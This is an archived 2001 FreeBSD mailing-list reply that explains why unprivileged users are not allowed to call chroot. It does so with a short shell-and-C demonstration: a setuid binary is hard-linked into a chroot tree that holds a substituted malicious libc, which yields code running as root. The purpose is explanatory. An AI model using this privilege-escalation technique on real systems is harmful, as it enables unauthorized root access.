From owner-freebsd-hackers Mon Oct 8 5:23:54 2001 Delivered-To: freebsd-hackers@freebsd.org Received: from lindt.urgle.com (lindt.urgle.com [62.49.202.23]) by hub.freebsd.org (Postfix) with ESMTP id C85DD37B409 for ; Mon, 8 Oct 2001 05:23:49 -0700 (PDT) Received: from mike by lindt.urgle.com with local (Exim 3.30 #1) id 15qZRI-000De0-00; Mon, 08 Oct 2001 12:23:20 +0000 Date: Mon, 8 Oct 2001 13:23:20 +0100 From: Mike Bristow To: Thierry Black Cc: freebsd-hackers@freebsd.org Subject: Re: chroot Message-ID: <20011008132320.B52388@lindt.urgle.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from thierryblack@hotmail.com on Thu, Oct 04, 2001 at 05:32:16PM -0600 X-Rated: World Trade Center, Vince Foster, Ortega Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, Oct 04, 2001 at 05:32:16PM -0600, Thierry Black wrote: [ please don't write in HTML. Do it again and I'll drop you in a kill file.] However, to answer the question "why don't we allow users to chroot", I present you with: $ mkdir -p hack/usr/lib $ mkdir -p hack/usr/bin $ cp evilness.so hack/usr/lib/libc.so $ ln /usr/bin/at hack/usr/bin $ cat hack-a-tack.c #include int main (void) { chroot("hack"); exec ("/usr/bin/at", "/usr/bin/at", NULL);} $ gcc -o hack-a-tack hack-a-tack.c $ ./hack-a-tack Now, code I wrote is running with root privilages. While it's clearly running in a chrooted enviroment, you can still do Very Bad Things. (This, of course, assumes that you have write permissions somewhere on the same file system as a suid program. This is probably true on many systems) -- Mike Bristow, seebitwopie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message